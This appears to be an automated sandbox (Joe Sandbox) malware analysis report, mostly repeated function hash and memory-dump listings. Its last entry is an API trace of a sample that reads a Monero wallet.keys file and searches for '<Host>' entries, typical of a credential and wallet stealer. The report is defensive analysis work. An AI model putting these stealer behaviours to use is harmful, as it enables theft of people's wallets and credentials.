                              • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction ID: e2cf34481bf0e7595d59682c3c0c823355ad80b5ca2add1f06e3fab6561701b2
                              • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction Fuzzy Hash: 9BB10571A097158FD706EE39C481229F7E1FFE6280F51C72EF895A7662EB31E8818744
                              Function 00881EE8 Relevance: .3, Instructions: 274COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction ID: 57bb4aa54c901cd20f0f26f07b37659a173faf8786a2f0cf28a00c9be80c4832
                              • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction Fuzzy Hash: 1991C271A002158BDF15EE68DC84BBAB3A4FF55304F294569ED18EB382D732ED05C7A2
                              Function 008996FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction ID: 3172aea37686111775f53f7babe86d0fea84bb7a6824e483efd174a6853639a5
                              • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction Fuzzy Hash: E5B138316106099FDB15DF2CC48AB657BA0FF45364F29869CE8DACF2A2C735E991CB40
                              Function 0086B198 Relevance: .3, Instructions: 268COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction ID: 63b33996941bd090c244aa0847840833ebc2eb0dc2e9ace4bfb713f3d56628f0
                              • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction Fuzzy Hash: C7C14A75A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E996CF81
                              Function 0087D5A8 Relevance: .3, Instructions: 258COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction ID: 943f658617d28de939db92e2f1707197c83f9c294b7075260d681c89ae4529e5
                              • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction Fuzzy Hash: 519159319287946AEB169B3CCC417AAB7A4FFE6350F14C72AF98CB2491FB71C5818345
                              Function 0088D39E Relevance: .2, Instructions: 242COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction ID: bffff7802fdd9095d8c66f4ceeb75dd81d8649919a23feef2429c94dde6c3cac
                              • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction Fuzzy Hash: 85A11D72A10B19CBEB19CF55CCC1A9ABBB1FB58314F14C62AD41AE72A1D334A944CF94
                              Function 00854288 Relevance: .2, Instructions: 240COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction ID: fc3a043a77c03877f96fb3a7a161a10fe421a0b180302328e1948953ceb7d4ef
                              • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction Fuzzy Hash: E1A17D72A083119BD308CF25C89075BF7E2FFC8714F1ACA3DA89997254D774E8449B82
                              Function 00CE2854 Relevance: .2, Instructions: 158COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce8163cc5956f9971a804b80d4d0244906c07c7741a1af60d572d615f20b6c46
                              • Instruction ID: 13d0bc27a775868065bcad125b0aa10a0c785944632c14ecab1dfbaba181476e
                              • Opcode Fuzzy Hash: ce8163cc5956f9971a804b80d4d0244906c07c7741a1af60d572d615f20b6c46
                              • Instruction Fuzzy Hash: 6951E3B36096009FE708AE39D88566ABBE9EFD8320F16893EE6C5C7744D6305844C756
                              Function 00886799 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction ID: 569db6a0b3471a31f6794e0887e9b2fb5baffe5888b66b58baf79b54e2ae76d0
                              • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction Fuzzy Hash: B4516962E09BD985C7058B7944502EEBFB26FE6200F1E829EC4985B383D2359689C3E5
                              Function 00BB0A5B Relevance: .1, Instructions: 117COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 380e0c8eaabb946c4091138fbb96011b54c46bfa2104c0db0f4524317598c91e
                              • Instruction ID: dbe6ea673dcc1fb68734ba31be8e3ff619c0767e3db566da83de9017eed215e7
                              • Opcode Fuzzy Hash: 380e0c8eaabb946c4091138fbb96011b54c46bfa2104c0db0f4524317598c91e
                              • Instruction Fuzzy Hash: E4318BF36142080BE748592EDC55736B3DAEBD4320F2B063EDA46C7380EC79A90A4159
                              Function 00857588 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                              • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                              Function 00829AA0 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 008203B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00830DBF,00830DBE,00830DBB,00830DBA), ref: 008204C2
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008204C9
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 008204E5
